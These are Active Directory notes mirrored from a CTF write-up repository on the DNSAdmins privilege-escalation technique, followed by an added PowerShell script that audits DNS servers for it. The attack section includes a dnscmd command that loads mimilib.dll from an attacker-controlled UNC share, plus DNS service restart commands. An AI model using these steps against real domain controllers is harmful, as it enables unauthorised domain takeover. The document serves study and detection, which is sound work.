mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 21:30:17 +00:00
Domain Enumeration - DNSAdmins
Members of DNSAdmins can load an arbitrary DLL with the privileges of dns.exe. If the Domain Controller (DC) also serves as the DNS server, this allows escalation to Domain Admins (DA).
PowerView
Enumerate members of DNSAdmins group
Get-NetGroupMember -GroupName "DNSAdmins"
AD Module
Enumerate members of DNSAdmins group
Get-ADGroupMember -Identity DNSAdmins
Configure DLL using dnscmd.exe
dnscmd dc-name or 127.0.0.1 /config /serverlevelplugindll \\your_attacker_ip\dll\mimilib.dll
Restart dns service
sc.exe stop dns
sc.exe start dns
Or alternatively follow this
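To check a DNS server for this from the defender's side, the following added example (not part of the original notes) lists DNSAdmins members, reads the ServerLevelPluginDll registry value that the dnscmd setting above writes, and pulls DNS Server events 150 and 770 (plugin load failure and success). The function name, the 30-day window, the registry path and the event IDs are not from the page; it assumes an elevated session on the DNS server with the ActiveDirectory module installed.

```powershell
# Added defensive example: audit a DNS server / DC for the DNSAdmins
# plugin-DLL technique. Get-DnsPluginAudit is a hypothetical helper name.
Import-Module ActiveDirectory

function Get-DnsPluginAudit {
    [CmdletBinding()]
    param(
        [string]$GroupName = 'DNSAdmins',
        [int]$DaysBack = 30   # constructed default look-back window
    )

    # 1. Who is able to set the plugin DLL? -Recursive expands nested groups.
    $members = Get-ADGroupMember -Identity $GroupName -Recursive |
        Select-Object -ExpandProperty SamAccountName

    # 2. Is a plugin DLL configured? The /serverlevelplugindll setting is
    #    stored in this registry value; it is absent on a default install.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $dll = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll `
                -ErrorAction SilentlyContinue).ServerLevelPluginDll

    # 3. Did dns.exe load (770) or fail to load (150) a plugin recently?
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'DNS Server'
        Id        = 150, 770
        StartTime = (Get-Date).AddDays(-$DaysBack)
    } -ErrorAction SilentlyContinue

    [pscustomobject]@{
        GroupMembers = $members
        PluginDll    = $dll
        # A UNC path means the DLL is fetched from a remote share.
        PluginIsUnc  = [bool]($dll -like '\\*')
        PluginEvents = $events | Select-Object TimeCreated, Id, Message
    }
}

$audit = Get-DnsPluginAudit
$audit | Format-List
if ($audit.PluginDll) {
    Write-Warning "ServerLevelPluginDll is set to '$($audit.PluginDll)'; verify it is an approved plugin."
}
```

An empty PluginDll with a small, expected GroupMembers list is the healthy state; any UNC path or unexplained 150/770 event warrants investigation.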